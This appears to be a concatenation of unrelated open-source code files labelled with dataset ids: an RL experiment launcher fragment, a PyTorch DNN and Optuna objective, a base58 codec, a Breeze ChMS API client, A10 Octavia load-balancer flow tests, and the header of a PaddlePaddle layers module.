model_dirs = ["/data/adam/ul4rl/models/20200901/atari_atc_ul_single/"]
values = list(
zip(
n_steps,
pretrain_algos,
replays,
model_dirs,
)
)
dir_names = ["RlFromUl"] # TRAIN SCRIPT SPLITS OFF THIS
keys = [
("runner", "n_steps"),
("pretrain", "algo"),
("pretrain", "replay"),
("pretrain", "model_dir"),
]
variant_levels_1.append(VariantLevel(keys, values, dir_names))
# variant_levels_2.append(VariantLevel(keys, values, dir_names))
stop_conv_grads = [True]
hidden_sizes = [512]
values = list(zip(stop_conv_grads, hidden_sizes))
dir_names = ["{}_stpcnvgrd_{}hs".format(*v) for v in values]
keys = [("model", "stop_conv_grad"), ("model", "hidden_sizes")]
variant_levels_1.append(VariantLevel(keys, values, dir_names))
# variant_levels_2.append(VariantLevel(keys, values, dir_names))
variants_1, log_dirs_1 = make_variants(*variant_levels_1)
# variants_2, log_dirs_2 = make_variants(*variant_levels_2)
variants = variants_1 # + variants_2
log_dirs = log_dirs_1 # + log_dirs_2
num_variants = len(variants)
variants_per = num_variants // num_computers
my_start = my_computer * variants_per
if my_computer == num_computers - 1:
my_end = num_variants
else:
my_end = (my_computer + 1) * variants_per
my_variants = variants[my_start:my_end]
my_log_dirs = log_dirs[my_start:my_end]
default_config_key = "ppo_16env"
run_experiments(
script=script,
affinity_code=affinity_code,
experiment_title=experiment_title,
runs_per_setting=runs_per_setting,
variants=my_variants,
log_dirs=my_log_dirs,
common_args=(default_config_key, experiment_title),
)
|
the-stack_0_3680 | import torch
import torch.nn as nn
import physics_aware_training.digital_twin_utils
class DNN(nn.Module):
def __init__(self, input_dim, nparams, output_dim, Nunits = None, batchnorm = False, nlaf = 'relu', **kwargs):
'''
Defines configurable deep neural network with fully connected layers and a choice of
nonlinear activation functions.
Args:
input_dim (int): dimension of input layer
output_dim (int): dimension of output layer
Nunits (list of int): dimensions of hidden layers
batchnorm (bool): determines whether to use batchnorm between each hidden layer.
The order in which batchnorm is applied is:
fully connected layer - batchnorm - nonlinear activation function
nlaf (string): determines the nonlinear activation function. Choices:
'relu', 'tanh', 'sigmoid'
'''
super(DNN, self).__init__()
if Nunits == None:
Nunits = [100, 100]
self.batchnorm = batchnorm
self.nlaf = nlaf
Nunits.insert(0, input_dim + nparams)
self.layers = nn.ModuleList([])
for i in range(len(Nunits) - 1):
self.layers.append(nn.Linear(Nunits[i], Nunits[i+1]))
self.outputlayer = nn.Linear(Nunits[-1], output_dim)
if batchnorm:
self.batchnorms = nn.ModuleList([])
for i in range(len(Nunits)-1):
self.batchnorms.append(nn.BatchNorm1d(Nunits[i+1]))
def forward(self, x):
'''
Performs the forward pass through the network.
Args:
x (float tensor): inputs of dimension [batch_size, input_dim + nparams]
'''
if self.nlaf == 'relu':
nlaf = torch.relu
elif self.nlaf == 'tanh':
nlaf = torch.tanh
elif self.nlaf == 'sigmoid':
nlaf = torch.sigmoid
for i, layer in enumerate(self.layers):
x = layer(x)
if self.batchnorm:
x = self.batchnorms[i](x)
x = nlaf(x)
return self.outputlayer(x)
class DNNObjective(object):
# define class to smuggle additional arguments into objective function
def __init__(self, train_loader, test_loader, dt_path,
input_dim, nparams, output_dim, **modelargs):
'''
Defines an optuna objective which optimizes hyperparameters drawn from the
distribution defined in __call__.
Args:
dt_path (string): Location at which best model will be saved
'''
self.modelargs = modelargs
self.dt_path = dt_path
self.train_loader = train_loader
self.test_loader = test_loader
self.input_dim = input_dim
self.nparams = nparams
self.output_dim = output_dim
def __call__(self, trial):
Nlayers = trial.suggest_categorical("Nlayers", [1, 2, 3, 4, 5])
lr = trial.suggest_loguniform("lr", 1e-4, 1e-1)
Nunits = []
if Nlayers == 1:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
if Nlayers == 2:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
if Nlayers == 3:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
if Nlayers == 4:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
if Nlayers == 5:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits5", 50, 1000)))
name = f"{self.dt_path}_v{trial.number}" #create name with trial index
value, model_path = physics_aware_training.digital_twin_utils.train_loop_reg_model(
self.train_loader,
self.test_loader,
name,
self.input_dim,
self.nparams,
self.output_dim,
Model = DNN,
Nunits = Nunits,
Nlayers = Nlayers,
lr = lr,
trial = trial,
**self.modelargs)
trial.set_user_attr('model_path', model_path) #save the model path string in NAS study
return value |
the-stack_0_3681 | # Copyright (c) 2012-2018 The Divi Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Divi base58 encoding and decoding.
Based on https://divitalk.org/index.php?topic=1026.0 (public domain)
'''
import hashlib
# for compatibility with following code...
class SHA256:
new = hashlib.sha256
if str != bytes:
# Python 3.x
def ord(c):
return c
def chr(n):
return bytes( (n,) )
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
b58chars = __b58chars
def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""
long_value = 0
for (i, c) in enumerate(v[::-1]):
if isinstance(c, str):
c = ord(c)
long_value += (256**i) * c
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Divi does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == 0:
nPad += 1
else:
break
return (__b58chars[0]*nPad) + result
def b58decode(v, length = None):
""" decode v into a string of len bytes
"""
long_value = 0
for i, c in enumerate(v[::-1]):
pos = __b58chars.find(c)
assert pos != -1
long_value += pos * (__b58base**i)
result = bytes()
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]:
nPad += 1
continue
break
result = bytes(nPad) + result
if length is not None and len(result) != length:
return None
return result
def checksum(v):
"""Return 32-bit checksum based on SHA256"""
return SHA256.new(SHA256.new(v).digest()).digest()[0:4]
def b58encode_chk(v):
"""b58encode a string, with 32-bit checksum"""
return b58encode(v + checksum(v))
def b58decode_chk(v):
"""decode a base58 string, check and remove checksum"""
result = b58decode(v)
if result is None:
return None
if result[-4:] == checksum(result[:-4]):
return result[:-4]
else:
return None
def get_bcaddress_version(strAddress):
""" Returns None if strAddress is invalid. Otherwise returns integer version of address. """
addr = b58decode_chk(strAddress)
if addr is None or len(addr)!=21:
return None
version = addr[0]
return ord(version)
if __name__ == '__main__':
# Test case (from http://gitorious.org/divi/python-base58.git)
assert get_bcaddress_version('15VjRaDX9zpbA8LVnbrCAFzrVzN7ixHNsC') is 0
_ohai = 'o hai'.encode('ascii')
_tmp = b58encode(_ohai)
assert _tmp == 'DYB3oMS'
assert b58decode(_tmp, 5) == _ohai
print("Tests passed")
|
the-stack_0_3682 | """Python wrapper for Breeze ChMS API: http://www.breezechms.com/api
This API wrapper allows churches to build custom functionality integrated with
Breeze Church Management System.
Usage:
from breeze import breeze
breeze_api = breeze.BreezeApi(
breeze_url='https://demo.breezechms.com',
api_key='5c2d2cbacg3...')
people = breeze_api.get_people();
for person in people:
print '%s %s' % (person['first_name'], person['last_name'])
"""
__author__ = '[email protected] (Alex Ortiz-Rosado)'
import logging
import requests
from .utils import make_enum
ENDPOINTS = make_enum(
'BreezeApiURL',
PEOPLE='/api/people',
EVENTS='/api/events',
PROFILE_FIELDS='/api/profile',
CONTRIBUTIONS='/api/giving',
FUNDS='/api/funds',
PLEDGES='/api/pledges',
TAGS='/api/tags',
ACCOUNT_SUMMARY='/api/account/summary')
class BreezeError(Exception):
"""Exception for BreezeApi."""
pass
class BreezeApi(object):
"""A wrapper for the Breeze REST API."""
def __init__(self, breeze_url, api_key,
dry_run=False,
connection=requests.Session()):
"""Instantiates the BreezeApi with your Breeze account information.
Args:
breeze_url: Fully qualified domain for your organizations Breeze
service.
api_key: Unique Breeze API key. For instructions on finding your
organizations API key, see:
http://breezechms.com/docs#extensions_api
dry_run: Enable no-op mode, which disables requests from being made.
When combined with debug, this allows debugging requests
without affecting data in your Breeze account."""
self.breeze_url = breeze_url
self.api_key = api_key
self.dry_run = dry_run
self.connection = connection
# TODO(alex): use urlparse to check url format.
if not (self.breeze_url and self.breeze_url.startswith('https://') and
self.breeze_url.find('.breezechms.')):
raise BreezeError('You must provide your breeze_url as ',
'subdomain.breezechms.com')
if not self.api_key:
raise BreezeError('You must provide an API key.')
def _request(self, endpoint, params=None, headers=None, timeout=60):
"""Makes an HTTP request to a given url.
Args:
endpoint: URL where the service can be accessed.
params: Query parameters to append to endpoint url.
headers: HTTP headers; used for authenication parameters.
timeout: Timeout in seconds for HTTP request.
Returns:
HTTP response
Throws:
BreezeError if connection or request fails."""
if headers is None:
headers = {}
headers.update({
'Content-Type': 'application/json',
'Api-Key': self.api_key}
)
if params is None:
params = {}
keywords = dict(params=params, headers=headers, timeout=timeout)
url = '%s%s' % (self.breeze_url, endpoint)
logging.debug('Making request to %s', url)
if self.dry_run:
return
response = self.connection.get(url, verify=True, **keywords)
try:
response = response.json()
except requests.ConnectionError as error:
raise BreezeError(error)
else:
if not self._request_succeeded(response):
raise BreezeError(response)
logging.debug('JSON Response: %s', response)
return response
def _request_succeeded(self, response):
"""Predicate to ensure that the HTTP request succeeded."""
if isinstance(response, bool):
return response
else:
return not (('errors' in response) or ('errorCode' in response))
def get_account_summary(self):
"""Retrieve the details for a specific account using the API key
and URL. It can also work to see if the key and URL are valid.
Returns:
JSON response. For example:
{
"id":"1234",
"name":"Grace Church",
"subdomain":"gracechurchdemo",
"status":"1",
"created_on":"2018-09-10 09:19:35",
"details":{
"timezone":"America\/New_York",
"country":{
"id":"2",
"name":"United States of America",
"abbreviation":"USA",
"abbreviation_2":"US",
"currency":"USD",
"currency_symbol":"$",
"date_format":"MDY",
"sms_prefix":"1"
}
}
}
"""
return self._request(ENDPOINTS.ACCOUNT_SUMMARY)
def get_people(self, limit=None, offset=None, details=False):
"""List people from your database.
Args:
limit: Number of people to return. If None, will return all people.
offset: Number of people to skip before beginning to return results.
Can be used in conjunction with limit for pagination.
details: Option to return all information (slower) or just names.
returns:
JSON response. For example:
{
"id":"157857",
"first_name":"Thomas",
"last_name":"Anderson",
"path":"img\/profiles\/generic\/blue.jpg"
},
{
"id":"157859",
"first_name":"Kate",
"last_name":"Austen",
"path":"img\/profiles\/upload\/2498d7f78s.jpg"
},
{
...
}"""
params = []
if limit:
params.append('limit=%s' % limit)
if offset:
params.append('offset=%s' % offset)
if details:
params.append('details=1')
return self._request('%s/?%s' % (ENDPOINTS.PEOPLE, '&'.join(params)))
def get_profile_fields(self):
"""List profile fields from your database.
Returns:
JSON response."""
return self._request(ENDPOINTS.PROFILE_FIELDS)
def get_person_details(self, person_id):
"""Retrieve the details for a specific person by their ID.
Args:
person_id: Unique id for a person in Breeze database.
Returns:
JSON response."""
return self._request('%s/%s' % (ENDPOINTS.PEOPLE, str(person_id)))
def add_person(self, first_name, last_name, fields_json=None):
"""Adds a new person into the database.
Args:
first_name: The first name of the person.
last_name: The first name of the person.
fields_json: JSON string representing an array of fields to update.
Each array element must contain field id, field type, response,
and in some cases, more information.
ie. [ {
"field_id":"929778337",
"field_type":"email",
"response":"true",
"details":{
"address": "[email protected]",
"is_private":1}
}
].
Obtain such field information from get_profile_fields() or
use get_person_details() to see fields that already exist for a specific person.
Returns:
JSON response equivalent to get_person_details()."""
params = []
params.append('first=%s' % first_name)
params.append('last=%s' % last_name)
if fields_json:
params.append('fields_json=%s' % fields_json)
return self._request('%s/add?%s' % (ENDPOINTS.PEOPLE, '&'.join(params)))
def update_person(self, person_id, fields_json):
"""Updates the details for a specific person in the database.
Args:
person_id: Unique id for a person in Breeze database.
fields_json: JSON string representing an array of fields to update.
Each array element must contain field id, field type, response,
and in some cases, more information.
ie. [ {
"field_id":"929778337",
"field_type":"email",
"response":"true",
"details":{
"address": "[email protected]",
"is_private":1}
}
].
Obtain such field information from get_profile_fields() or
use get_person_details() to see fields that already exist for a specific person.
Returns:
JSON response equivalent to get_person_details(person_id)."""
return self._request(
'%s/update?person_id=%s&fields_json=%s' % (
ENDPOINTS.PEOPLE, person_id, fields_json
))
def get_events(self, start_date=None, end_date=None):
"""Retrieve all events for a given date range.
Args:
start_date: Start date; defaults to first day of the current month.
end_date: End date; defaults to last day of the current month
Returns:
JSON response."""
params = []
if start_date:
params.append('start=%s' % start_date)
if end_date:
params.append('end=%s' % end_date)
return self._request('%s/?%s' % (ENDPOINTS.EVENTS, '&'.join(params)))
def event_check_in(self, person_id, event_instance_id):
"""Checks in a person into an event.
Args:
person_id: id for a person in Breeze database.
event_instance_id: id for event instance to check into.."""
return self._request(
'%s/attendance/add?person_id=%s&instance_id=%s' % (
ENDPOINTS.EVENTS, str(person_id), str(event_instance_id)
))
def event_check_out(self, person_id, event_instance_id):
"""Remove the attendance for a person checked into an event.
Args:
person_id: Breeze ID for a person in Breeze database.
event_instance_id: id for event instance to check out (delete).
Returns:
True if check-out succeeds; False if check-out fails."""
return self._request(
'%s/attendance/delete?person_id=%s&instance_id=%s' % (
ENDPOINTS.EVENTS, str(person_id), str(event_instance_id)
))
def add_contribution(self,
date=None,
name=None,
person_id=None,
uid=None,
processor=None,
method=None,
funds_json=None,
amount=None,
group=None,
batch_number=None,
batch_name=None):
"""Add a contribution to Breeze.
Args:
date: Date of transaction in DD-MM-YYYY format (ie. 24-5-2015)
name: Name of person that made the transaction. Used to help match up
contribution to correct profile within Breeze. (ie. John Doe)
person_id: The Breeze ID of the donor. If unknown, use UID instead of
person id (ie. 1234567)
uid: The unique id of the person sent from the giving platform. This
should be used when the Breeze ID is unknown. Within Breeze a
user will be able to associate this ID with a given Breeze ID.
(ie. 9876543)
email: Email address of donor. If no person_id is provided, used to
help automatically match the person to the correct profile.
(ie. [email protected])
street_address: Donor's street address. If person_id is not provided,
street_address will be used to help automatically
match the person to the correct profile.
(ie. 123 Sample St)
processor: The name of the processor used to send the payment. Used
in conjunction with uid. Not needed if using Breeze ID.
(ie. SimpleGive, BluePay, Stripe)
method: The payment method. (ie. Check, Cash, Credit/Debit Online,
Credit/Debit Offline, Donated Goods (FMV), Stocks (FMV),
Direct Deposit)
funds_json: JSON string containing fund names and amounts. This
allows splitting fund giving. The ID is optional. If
present, it must match an existing fund ID and it will
override the fund name.
ie. [ {
'id':'12345',
'name':'General Fund',
'amount':'100.00'
},
{
'name':'Missions Fund',
'amount':'150.00'
}
]
amount: Total amount given. Must match sum of amount in funds_json.
group: This will create a new batch and enter all contributions with
the same group into the new batch. Previous groups will be
remembered and so they should be unique for every new batch.
Use this if wanting to import into the next batch number in a
series.
batch_number: The batch number to import contributions into. Use
group instead if you want to import into the next batch
number.
batch_name: The name of the batch. Can be used with batch number or
group.
Returns:
Payment Id.
Throws:
BreezeError on failure to add contribution."""
params = []
if date:
params.append('date=%s' % date)
if name:
params.append('name=%s' % name)
if person_id:
params.append('person_id=%s' % person_id)
if uid:
params.append('uid=%s' % uid)
if processor:
params.append('processor=%s' % processor)
if method:
params.append('method=%s' % method)
if funds_json:
params.append('funds_json=%s' % funds_json)
if amount:
params.append('amount=%s' % amount)
if group:
params.append('group=%s' % group)
if batch_number:
params.append('batch_number=%s' % batch_number)
if batch_name:
params.append('batch_name=%s' % batch_name)
response = self._request('%s/add?%s' % (ENDPOINTS.CONTRIBUTIONS,
'&'.join(params)))
return response['payment_id']
def edit_contribution(self,
payment_id=None,
date=None,
name=None,
person_id=None,
uid=None,
processor=None,
method=None,
funds_json=None,
amount=None,
group=None,
batch_number=None,
batch_name=None):
"""Edit an existing contribution.
Args:
payment_id: The ID of the payment that should be modified.
date: Date of transaction in DD-MM-YYYY format (ie. 24-5-2015)
name: Name of person that made the transaction. Used to help match up
contribution to correct profile within Breeze. (ie. John Doe)
person_id: The Breeze ID of the donor. If unknown, use UID instead of
person id (ie. 1234567)
uid: The unique id of the person sent from the giving platform. This
should be used when the Breeze ID is unknown. Within Breeze a
user will be able to associate this ID with a given Breeze ID.
(ie. 9876543)
email: Email address of donor. If no person_id is provided, used to
help automatically match the person to the correct profile.
(ie. [email protected])
street_address: Donor's street address. If person_id is not provided,
street_address will be used to help automatically
match the person to the correct profile.
(ie. 123 Sample St)
processor: The name of the processor used to send the payment. Used
in conjunction with uid. Not needed if using Breeze ID.
(ie. SimpleGive, BluePay, Stripe)
method: The payment method. (ie. Check, Cash, Credit/Debit Online,
Credit/Debit Offline, Donated Goods (FMV), Stocks (FMV),
Direct Deposit)
funds_json: JSON string containing fund names and amounts. This
allows splitting fund giving. The ID is optional. If
present, it must match an existing fund ID and it will
override the fund name.
ie. [ {
'id':'12345',
'name':'General Fund',
'amount':'100.00'
},
{
'name':'Missions Fund',
'amount':'150.00'
}
]
amount: Total amount given. Must match sum of amount in funds_json.
group: This will create a new batch and enter all contributions with
the same group into the new batch. Previous groups will be
remembered and so they should be unique for every new batch.
Use this if wanting to import into the next batch number in a
series.
batch_number: The batch number to import contributions into. Use
group instead if you want to import into the next batch
number.
batch_name: The name of the batch. Can be used with batch number or
group.
Returns:
Payment id.
Throws:
BreezeError on failure to edit contribution."""
params = []
if payment_id:
params.append('payment_id=%s' % payment_id)
if date:
params.append('date=%s' % date)
if name:
params.append('name=%s' % name)
if person_id:
params.append('person_id=%s' % person_id)
if uid:
params.append('uid=%s' % uid)
if processor:
params.append('processor=%s' % processor)
if method:
params.append('method=%s' % method)
if funds_json:
params.append('funds_json=%s' % funds_json)
if amount:
params.append('amount=%s' % amount)
if group:
params.append('group=%s' % group)
if batch_number:
params.append('batch_number=%s' % batch_number)
if batch_name:
params.append('batch_name=%s' % batch_name)
response = self._request('%s/edit?%s' % (ENDPOINTS.CONTRIBUTIONS,
'&'.join(params)))
return response['payment_id']
def delete_contribution(self, payment_id):
"""Delete an existing contribution.
Args:
payment_id: The ID of the payment that should be deleted.
Returns:
Payment id.
Throws:
BreezeError on failure to delete contribution."""
response = self._request('%s/delete?payment_id=%s' % (
ENDPOINTS.CONTRIBUTIONS, payment_id
))
return response['payment_id']
def list_contributions(self,
start_date=None,
end_date=None,
person_id=None,
include_family=False,
amount_min=None,
amount_max=None,
method_ids=None,
fund_ids=None,
envelope_number=None,
batches=None,
forms=None):
"""Retrieve a list of contributions.
Args:
start_date: Find contributions given on or after a specific date
(ie. 2015-1-1); required.
end_date: Find contributions given on or before a specific date
(ie. 2018-1-31); required.
person_id: ID of person's contributions to fetch. (ie. 9023482)
include_family: Include family members of person_id (must provide
person_id); default: False.
amount_min: Contribution amounts equal or greater than.
amount_max: Contribution amounts equal or less than.
method_ids: List of method IDs.
fund_ids: List of fund IDs.
envelope_number: Envelope number.
batches: List of Batch numbers.
forms: List of form IDs.
Returns:
List of matching contributions.
Throws:
BreezeError on malformed request."""
params = []
if start_date:
params.append('start=%s' % start_date)
if end_date:
params.append('end=%s' % end_date)
if person_id:
params.append('person_id=%s' % person_id)
if include_family:
if not person_id:
raise BreezeError('include_family requires a person_id.')
params.append('include_family=1')
if amount_min:
params.append('amount_min=%s' % amount_min)
if amount_max:
params.append('amount_max=%s' % amount_max)
if method_ids:
params.append('method_ids=%s' % '-'.join(method_ids))
if fund_ids:
params.append('fund_ids=%s' % '-'.join(fund_ids))
if envelope_number:
params.append('envelope_number=%s' % envelope_number)
if batches:
params.append('batches=%s' % '-'.join(batches))
if forms:
params.append('forms=%s' % '-'.join(forms))
return self._request('%s/list?%s' % (ENDPOINTS.CONTRIBUTIONS,
'&'.join(params)))
def list_funds(self, include_totals=False):
"""List all funds.
Args:
include_totals: Amount given to the fund should be returned.
Returns:
JSON Reponse."""
params = []
if include_totals:
params.append('include_totals=1')
return self._request('%s/list?%s' %
(ENDPOINTS.FUNDS, '&'.join(params)))
def list_campaigns(self):
"""List of campaigns.
Returns:
JSON response."""
return self._request('%s/list_campaigns' % (ENDPOINTS.PLEDGES))
def list_pledges(self, campaign_id):
"""List of pledges within a campaign.
Args:
campaign_id: ID number of a campaign.
Returns:
JSON response."""
return self._request('%s/list_pledges?campaign_id=%s' % (
ENDPOINTS.PLEDGES, campaign_id
))
def get_tags(self, folder=None):
"""List of tags
Args:
folder: If set, only return tags in this folder id
Returns:
JSON response. For example:
[
{
"id":"523928",
"name":"4th & 5th",
"created_on":"2018-09-10 09:19:40",
"folder_id":"1539"
},
{
"id":"51994",
"name":"6th Grade",
"created_on":"2018-02-06 06:40:40",
"folder_id":"1539"
},
{ ... }
]"""
params = []
if folder:
params.append('folder_id=%s' % folder)
return self._request('%s/%s/?%s' % (ENDPOINTS.TAGS, 'list_tags', '&'.join(params)))
def get_tag_folders(api):
"""List of tag folders
Args: (none)
Returns:
JSON response, for example:
[
{
"id":"1234567",
"parent_id":"0",
"name":"All Tags",
"created_on":"2018-06-05 18:12:34"
},
{
"id":"8234253",
"parent_id":"120425",
"name":"Kids",
"created_on":"2018-06-05 18:12:10"
},
{
"id":"1537253",
"parent_id":"5923042",
"name":"Small Groups",
"created_on":"2018-09-10 09:19:40"
},
{
"id":"20033",
"parent_id":"20031",
"name":"Student Ministries",
"created_on":"2018-12-15 18:11:31"
}
]"""
return api._request("%s/%s" % (ENDPOINTS.TAGS, "list_folders"))
def assign_tag(self,
person_id,
tag_id):
"""
Update a person's tag/s.
params:
person_id: an existing person's user id
tag_id: the id number of the tag you want to assign to the user
output: true or false upon success or failure of tag update
"""
params = []
params.append('person_id=%s' % person_id)
params.append('tag_id=%s' % tag_id)
response = self._request('%s/assign?%s' %
(ENDPOINTS.TAGS, '&'.join(params)))
return response
def unassign_tag(self,
person_id,
tag_id):
"""
Delete a person's tag/s.
params:
person_id: an existing person's user id
tag_id: the id number of the tag you want to assign to the user
output: true or false upon success or failure of tag deletion
"""
params = []
params.append('person_id=%s' % person_id)
params.append('tag_id=%s' % tag_id)
response = self._request('%s/unassign?%s' %
(ENDPOINTS.TAGS, '&'.join(params)))
return response
|
the-stack_0_3684 | # Copyright 2019, A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
try:
from unittest import mock
except ImportError:
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from taskflow.patterns import linear_flow as flow
from octavia.common import constants
from octavia.common import data_models as o_data_models
from octavia.tests.unit import base
from a10_octavia.common import config_options
from a10_octavia.controller.worker.flows import a10_load_balancer_flows
from a10_octavia.tests.common import a10constants
RACK_DEVICE = {
"project_id": "project-rack-vthunder",
"ip_address": "10.0.0.1",
"device_name": "rack_vthunder",
"username": "abc",
"password": "abc",
"interface_vlan_map": {"1": {"11": {"use_dhcp": True}, "12": {"use_dhcp": True}}}
}
RACK_DEVICE_LIST = {
"project-rack-vthunder": {
"project_id": "project-rack-vthunder",
"ip_address": "10.0.0.1",
"device_name": "rack_vthunder",
"username": "abc",
"password": "abc",
"interface_vlan_map": {"1": {"11": {"use_dhcp": True}, "12": {"use_dhcp": True}}}
},
"[dev]rack_vthunder": {
"project_id": "project-rack-vthunder",
"ip_address": "10.0.0.1",
"device_name": "rack_vthunder",
"username": "abc",
"password": "abc",
"interface_vlan_map": {"1": {"11": {"use_dhcp": True}, "12": {"use_dhcp": True}}}
}
}
@mock.patch("octavia.controller.worker.v1.tasks.database_tasks.UpdateAmphoraVIPData")
class TestLoadBalancerFlows(base.TestCase):
def setUp(self):
super(TestLoadBalancerFlows, self).setUp()
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
self.conf.config(
group="controller_worker")
# amphora_driver='a10')
self.conf.config(group="nova", enable_anti_affinity=False)
self.flows = a10_load_balancer_flows.LoadBalancerFlows()
def tearDown(self):
super(TestLoadBalancerFlows, self).tearDown()
self.conf.reset()
def test_create_lb_flows(self, mock_net_driver):
lb = o_data_models.LoadBalancer(id=a10constants.MOCK_LOAD_BALANCER_ID,
project_id='project-vthunder')
(create_flow, store) = self.flows.get_delete_load_balancer_flow(lb, False, False)
self.assertIsInstance(create_flow, flow.Flow)
def test_create_lb_rack_vthunder_vlan_flow(self, mock_net_driver):
self.conf.register_opts(config_options.A10_GLOBAL_OPTS,
group=a10constants.A10_GLOBAL_CONF_SECTION)
self.conf.config(group=a10constants.A10_GLOBAL_CONF_SECTION, network_type='vlan')
target = self.flows.get_create_rack_vthunder_load_balancer_flow(
RACK_DEVICE, RACK_DEVICE_LIST, constants.TOPOLOGY_SINGLE)
self.assertIsInstance(target, flow.Flow)
def test_delete_lb_rack_vthunder_vlan_flow(self, mock_net_driver):
self.conf.register_opts(config_options.A10_GLOBAL_OPTS,
group=a10constants.A10_GLOBAL_CONF_SECTION)
self.conf.register_opts(config_options.A10_HARDWARE_THUNDER_OPTS,
group=a10constants.A10_HARDWARE_THUNDER_CONF_SECTION)
self.conf.config(group=a10constants.A10_GLOBAL_CONF_SECTION, network_type='vlan')
self.conf.config(group=a10constants.A10_HARDWARE_THUNDER_CONF_SECTION,
devices=[RACK_DEVICE])
lb = o_data_models.LoadBalancer(id=a10constants.MOCK_LOAD_BALANCER_ID,
project_id='project-rack-vthunder')
(del_flow, store) = self.flows.get_delete_load_balancer_flow(lb, False, False)
self.assertIsInstance(del_flow, flow.Flow)
|
the-stack_0_3685 | # Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
All layers just related to the neural network.
"""
from __future__ import print_function
import os
import inspect
import warnings
import numpy as np
import six
import paddle
from ..layer_helper import LayerHelper
from ..initializer import Normal, Constant, NumpyArrayInitializer
from ..framework import Variable, OpProtoHolder, in_dygraph_mode, dygraph_only, _dygraph_tracer, default_main_program
from .. import dygraph_utils
from ..param_attr import ParamAttr
from .layer_function_generator import autodoc, templatedoc, _generate_doc_string_
from .tensor import concat, assign, fill_constant, zeros, tensor_array_to_tensor
from . import utils
from .. import unique_name
from functools import reduce
from .. import core
from ..data_feeder import convert_dtype, check_variable_and_dtype, check_type, check_dtype
import paddle
__all__ = [
'fc',
'embedding',
'linear_chain_crf',
'crf_decoding',
'cos_sim',
'chunk_eval',
'conv2d',
'conv3d',
'softmax',
'pool2d',
'pool3d',
'adaptive_pool2d',
'adaptive_pool3d',
'batch_norm',
'inplace_abn',
'instance_norm',
'data_norm',
'conv2d_transpose',
'conv3d_transpose',
'reduce_sum',
'reduce_mean',
'reduce_max',
'reduce_min',
'reduce_prod',
'reduce_all',
'reduce_any',
'dropout',
'split',
'ctc_greedy_decoder',
'l2_normalize',
'matmul',
'topk',
'transpose',
'im2sequence',
'row_conv',
'multiplex',
'layer_norm',
'group_norm',
'spectral_norm',
'smooth_l1',
'one_hot',
'autoincreased_step_counter',
'reshape',
'squeeze',
'unsqueeze',
'lod_reset',
'lod_append',
'lrn',
'pad',
'pad_constant_like',
'label_smooth',
'roi_pool',
'roi_align',
'dice_loss',
'image_resize',
'image_resize_short',
'resize_bilinear',
'resize_trilinear',
'resize_nearest',
'gather',
'gather_nd',
'scatter',
'scatter_nd_add',
'scatter_nd',
'random_crop',
'mean_iou',
'relu',
'selu',
'log',
'crop',
'crop_tensor',
'elu',
'relu6',
'pow',
'stanh',
'hard_sigmoid',
'swish',
'prelu',
'brelu',
'leaky_relu',
'soft_relu',
'flatten',
'stack',
'pad2d',
'unstack',
'unique',
'unique_with_counts',
'expand',
'expand_as',
'scale',
'elementwise_add',
'elementwise_div',
'elementwise_sub',
'elementwise_mul',
'elementwise_max',
'elementwise_min',
'elementwise_pow',
'elementwise_mod',
'elementwise_floordiv',
'uniform_random_batch_size_like',
'gaussian_random',
'sampling_id',
'gaussian_random_batch_size_like',
'sum',
'slice',
'strided_slice',
'shape',
'rank',
'size',
'logical_and',
'logical_or',
'logical_xor',
'logical_not',
'clip',
'clip_by_norm',
'mean',
'mul',
'maxout',
'space_to_depth',
'affine_grid',
'affine_channel',
'similarity_focus',
'hash',
'grid_sampler',
'log_loss',
'add_position_encoding',
'bilinear_tensor_product',
'merge_selected_rows',
'get_tensor_from_selected_rows',
'shuffle_channel',
'temporal_shift',
'py_func',
'psroi_pool',
'prroi_pool',
'pixel_shuffle',
'fsp_matrix',
'continuous_value_model',
'where',
'sign',
'deformable_conv',
'unfold',
'deformable_roi_pooling',
'filter_by_instag',
'shard_index',
'hard_swish',
'gather_tree',
'uniform_random',
]
